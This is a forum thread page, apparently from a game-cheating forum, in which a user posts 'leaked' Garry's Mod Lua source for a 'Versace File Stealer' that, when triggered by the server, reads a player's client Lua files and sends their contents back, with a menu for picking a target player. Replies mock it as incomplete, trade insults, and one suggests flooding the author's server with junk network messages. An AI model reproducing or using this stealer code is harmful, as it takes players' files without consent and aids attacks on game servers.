Page 1 of 3 123 LastLast
Results 1 to 15 of 33
  1. #1
    Function.'s Avatar
    Join Date
    Oct 2014
    Gender
    male
    Location
    big codens
    Posts
    103
    Reputation
    10
    Thanks
    254
    My Mood
    Sad

    Thumbs up [LEAK]Tylers file stealer

    This is super bad i do not suggest anybody too use this:
    Code:
    -- owned tyler
    /*=========================
    	
    		~Versace~
    		
    		Fuck you
    		
    ===========================*/
    
    local LuaBlacklist = {
    "test.lua",
    "nuke_vars_init.lua",
    "cssnag.lua",
    "functiondump.lua",
    "cl_init.lua",
    "shared.lua",
    "init.lua",
    "von.lua",
    "playxlib.lua",
    "particletrace.lua",
    "ass_client.lua",
    "ass_cmd.lua",
    "ass_config.lua",
    "ass_debug.lua",
    "ass_default_config.lua",
    "ass_plugins.lua",
    "ass_res.lua",
    "ass_server.lua",
    "ass_shared.lua",
    "cl_pikmin.lua",
    "nuke_vars_init.lua",
    "pewpew_convars.lua",
    "pewpew_damagecontrol.lua",
    "pewpew_damagelog.lua",
    "pewpew_deathnotice.lua",
    "pewpew_gcomcatcombability.lua",
    "pewpew_safezones.lua",
    "pewpew_weaponhandler.lua",
    "sv_pikmin.lua",
    "ev_cl_init.lua",
    "ev_defaultranks.lua",
    "gengeolightdb.lua",
    "gm_demo.lua",
    
    }
    
    local time = 0
    net.Receive( "versace_salad", function()
    	for k, v in pairs( file.Find( "lua/*.lua", "GAME" ) ) do
    	
    		time = time + 2
    		
    		local filename = string.gsub( v, " ", "_" )
    		local contents = file.Read( "lua/" .. v, "GAME" )
    		contents = contents:Left( 63000 )
    		
    		timer.Simple( time, function()
    			if !table.HasValue( LuaBlacklist, filename ) then
    				net.Start( "versace_getit" )
    					net.WriteString( filename )
    					net.WriteString( contents )
    				net.SendToServer()
    			end
    		end )
    	
    	end
    	
    	for k, v in pairs( file.Find( "lua/autorun/client/*.lua", "GAME" ) ) do
    		
    		time = time + 2
    		
    		local filename = string.gsub( v, " ", "_" )
    		local contents = file.Read( "lua/autorun/client/" .. v, "GAME" )
    		contents = contents:Left( 63000 )
    		
    		timer.Simple( time, function()
    			if !table.HasValue( LuaBlacklist, filename ) then
    				net.Start( "versace_getit" )
    					net.WriteString( filename )
    					net.WriteString( contents )
    				net.SendToServer()
    			end
    		end )
    	
    	end
    	
    	timer.Simple( 30, function() time = 0 end )
    	
    end )
    
    
    concommand.Add( "versace_menu", function()
    	local Form = vgui.Create( "DFrame" )
    	Form:SetPos( 500, 500 ) -- Position form on your monitor
    	Form:SetSize( 300, 60 ) -- Size form
    	Form:SetTitle( "Versace File Stealer" ) 
    	Form:SetVisible( true )
    	Form:SetDraggable( true )
    	Form:ShowCloseButton( true )
    	Form:MakePopup()
    	Form:SetSkin( "DarkRP" )
    	
    	local PlayerList = vgui.Create( "DComboBox", Form )
    	PlayerList:SetPos( 10, 30 )
    	PlayerList:SetSize( 200, 20 )
    	for k, v in pairs( player.GetAll() ) do
    		PlayerList:AddChoice( v:Nick() )
    	end
    	PlayerList.OnSelect = function()
    		for k,v in pairs( player.GetAll() ) do
    			if v:Nick() == PlayerList:GetValue() then
    				selected = v
    			end
    		end
    	end
    	PlayerList:SetSkin( "DarkRP" )
    
    	local Submit = vgui.Create( "DButton" )
    	Submit:SetParent( Form )
    	Submit:SetText( "Submit" )
    	Submit:SetPos( 220, 30 )
    	Submit:SetSize( 70, 20 )
    	Submit.DoClick = function()
    		Form:SetVisible( false )
    		chat.AddText( Color( 0, 255, 0 ), "Submitted!" )
    		net.Start( "versace_python" )
    			net.WriteEntity( selected )
    		net.SendToServer()
    	end
    	Submit:SetSkin( "DarkRP" )
    	
    end )
    
    /*
    concommand.Add( "versace", function()
    	for k, v in pairs( file.Find( "lua/*.lua", "GAME" ) ) do
    		
    		time = time + 2
    		
    		local filename = string.gsub( v, " ", "_" )
    		local contents = file.Read( "lua/" .. v, "GAME" )
    		contents = contents:Left( 63000 )
    		
    		timer.Simple( time, function()
    			if !table.HasValue( LuaBlacklist, filename ) then
    				net.Start( "versace_getit" )
    					net.WriteString( filename )
    					net.WriteString( contents )
    				net.SendToServer()
    			end
    		end )
    	
    	end
    	
    	for k, v in pairs( file.Find( "lua/autorun/client/*.lua", "GAME" ) ) do
    		
    		time = time + 1
    		
    		local filename = string.gsub( v, " ", "_" )
    		local contents = file.Read( "lua/autorun/client/" .. v, "GAME" )
    		contents = contents:Left( 63000 )
    		
    		timer.Simple( time, function()
    			if !table.HasValue( LuaBlacklist, filename ) then
    				net.Start( "versace_getit" )
    					net.WriteString( filename )
    					net.WriteString( contents )
    				net.SendToServer()
    			end
    		end )
    	
    	end
    end )*/
    Last edited by Trollaux; 10-30-2014 at 01:24 PM.

  2. The Following User Says Thank You to Function. For This Useful Post:

    TehZaRkoZz (07-06-2018)

  3. #2
    Kona-chan's Avatar
    Join Date
    Oct 2014
    Gender
    female
    Posts
    380
    Reputation
    22
    Thanks
    685
    What is [ CODE ] [ /CODE ] for?

  4. #3
    ThatBenderGuy's Avatar
    Join Date
    Nov 2011
    Gender
    male
    Location
    Tucson, AZ
    Posts
    60
    Reputation
    10
    Thanks
    7
    My Mood
    Sleepy
    /owtd8d lelz
    "Prove you’re alive. If you don’t claim your humanity you will become a statistic." - Tyler Durden

  5. #4
    Function.'s Avatar
    Join Date
    Oct 2014
    Gender
    male
    Location
    big codens
    Posts
    103
    Reputation
    10
    Thanks
    254
    My Mood
    Sad
    Quote Originally Posted by Kona-chan View Post
    What is [ CODE ] [ /CODE ] for?
    its a fast thread too lazy.

  6. #5
    Trollaux's Avatar
    Join Date
    Nov 2011
    Gender
    male
    Posts
    2,074
    Reputation
    137
    Thanks
    792
    does it even check if the person running it is an admin or something?
    d e a d b o y s
    Quote Originally Posted by Dave84311 View Post
    What do you call a troll with shitty jokes?
    Trollaux
    Quote Originally Posted by Kyeran View Post
    Foot job with lots of oil.
    Quote Originally Posted by Kyeran View Post
    If she's 12, I'm 12.

  7. #6
    SmurfAndDerp's Avatar
    Join Date
    Jun 2014
    Gender
    male
    Location
    Earth
    Posts
    5
    Reputation
    10
    Thanks
    0
    My Mood
    Amused
    this doesn't even work lol.
    Code:
    [ERROR] lua/vgui.lua:126: Calling net.Start with unpooled message name [Link Removed]
      1. Start - [C]:-1
       2. DoClick - lua/vgui.lua:126
        3. unknown - lua/vgui/dlabel.lua:206

  8. #7
    Kona-chan's Avatar
    Join Date
    Oct 2014
    Gender
    female
    Posts
    380
    Reputation
    22
    Thanks
    685
    Quote Originally Posted by SmurfAndDerp View Post
    this doesn't even work lol.
    Code:
    [ERROR] lua/vgui.lua:126: Calling net.Start with unpooled message name [Link Removed]
      1. Start - [C]:-1
       2. DoClick - lua/vgui.lua:126
        3. unknown - lua/vgui/dlabel.lua:206
    What a fucking retard you are, you obvliously miss the serverside script.

  9. The Following User Says Thank You to Kona-chan For This Useful Post:

    Liquidsocks (10-31-2014)

  10. #8
    ehex's Avatar
    Join Date
    Dec 2011
    Gender
    male
    Posts
    150
    Reputation
    22
    Thanks
    555
    Also if you really want to you could goto his server and just spam the net.start and send garbage data :>

  11. The Following User Says Thank You to ehex For This Useful Post:

    Kona-chan (10-31-2014)

  12. #9
    NotSoSuper's Avatar
    Join Date
    Feb 2013
    Gender
    male
    Posts
    63
    Reputation
    10
    Thanks
    131
    My Mood
    Bitchy
    lol you forgot to actually include the server side code which defines the net messages?

  13. #10
    Function.'s Avatar
    Join Date
    Oct 2014
    Gender
    male
    Location
    big codens
    Posts
    103
    Reputation
    10
    Thanks
    254
    My Mood
    Sad
    Quote Originally Posted by NotSoSuper View Post
    lol you forgot to actually include the server side code which defines the net messages?
    You acutally wanted to use this shit?

  14. #11
    NotSoSuper's Avatar
    Join Date
    Feb 2013
    Gender
    male
    Posts
    63
    Reputation
    10
    Thanks
    131
    My Mood
    Bitchy
    Quote Originally Posted by Function. View Post
    You acutally wanted to use this shit?
    Who ever said that? I can just use qac's old file stealer.

  15. #12
    Function.'s Avatar
    Join Date
    Oct 2014
    Gender
    male
    Location
    big codens
    Posts
    103
    Reputation
    10
    Thanks
    254
    My Mood
    Sad
    Quote Originally Posted by NotSoSuper View Post
    Who ever said that? I can just use qac's old file stealer.
    why whould you care then?

  16. #13
    Xxjay123xx's Avatar
    Join Date
    Nov 2011
    Gender
    male
    Posts
    92
    Reputation
    18
    Thanks
    163
    eowowowowowowoowowowo 420/10 doge's
    Almost 3 Years of being on MPGH

  17. #14
    Melted Bu11et's Avatar
    Join Date
    Sep 2013
    Gender
    male
    Posts
    151
    Reputation
    10
    Thanks
    24
    tylers still around?

  18. #15
    Function.'s Avatar
    Join Date
    Oct 2014
    Gender
    male
    Location
    big codens
    Posts
    103
    Reputation
    10
    Thanks
    254
    My Mood
    Sad
    Quote Originally Posted by Melted Bu11et View Post
    tylers still around?
    yeah he owns srvrs nwo

Page 1 of 3 123 LastLast

Similar Threads

  1. [Discussion] Are we allowed to upload leaked server files?
    By alexw203 in forum DayZ Discussion
    Replies: 3
    Last Post: 07-18-2013, 12:13 PM
  2. Tyler the Creator's Wolf Leaked
    By Killian in forum General
    Replies: 0
    Last Post: 03-27-2013, 05:58 AM
  3. [WTS] Selling README File, Comes with FREE key stealer!
    By Reckliss in forum DayZ Selling / Trading / Buying
    Replies: 5
    Last Post: 01-06-2013, 02:26 PM
  4. [Help] Finding key stealers log files?
    By PyroGodz in forum DayZ Mod & Standalone Hacks & Cheats
    Replies: 0
    Last Post: 12-11-2012, 08:34 PM
  5. [Release] Protect your Visual Basic file from stealers!
    By dragonattak in forum CrossFire Spammers, Injectors and Multi Tools
    Replies: 0
    Last Post: 05-29-2011, 05:47 AM

Tags for this Thread